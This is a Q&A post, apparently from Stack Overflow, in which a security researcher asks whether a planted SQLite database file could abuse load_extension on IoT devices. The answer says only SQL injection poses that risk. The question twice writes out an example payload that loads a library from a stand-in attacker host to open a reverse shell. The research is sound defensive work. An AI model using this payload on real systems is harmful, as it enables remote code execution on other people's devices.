# Creating hostile SQLite database for import on IoT device

Tags: sqlite, security

I'm doing some security research on some IoT devices some of which allow an attacker to just copy a sqlite db file over the existing file, reboot, and now use the attacker's db.  This seems like a bad idea to me.

From what I understand, something akin to INSERT INTO `test` VALUES (load_extension("//badguy.com/evil.so", "reverse_shell")); would cause an external library to execute (if load_extensions enabled which is the case for some of the IoT devices)

Not sure if this risk if only valid if they can actually do so via runtime SQL injection, or if it can be done by adding to the imported db schema also.

It's the latter, an attacker could exploit, though my poor attempts to create a test db with such a schema fail, as the SQL to add it just tries to run the payload (on my test pc) as opposed to changing the hostile db for an import test.

hex editing the test db just causes an error due to checksums etc.

It may be it's only SQL injection that is a risk anyway - in which case I can move on to next area of testing.

Tried both sqlite command shell and a Windows GUI to make the test db contain INSERT INTO `test` VALUES (load_extension("//badguy.com/evil.so", "reverse_shell")); but they simply execute the payload not change the db.

Is there a risk load_extension can be abused if the attacker can copy their own db on to the device?  If so, how can I test this?

Answer (score 0):

elperroborrachotoo on reddit answered this for me:

> Not sure if this risk if only valid if they can actually do so via runtime SQL injection, or if it can be done by adding to the imported db values also.

Only the former, the load_extension is called when the statement is evaluated. No evaluation of database content happens.1

SQLite file format is documented, so when editing the database, you could also update the respective checksums.

but they simply execute the payload not change the db.

The statement you use would insert the result of calling load_extension; it may be rejected because it's None.

1. unless there are bugs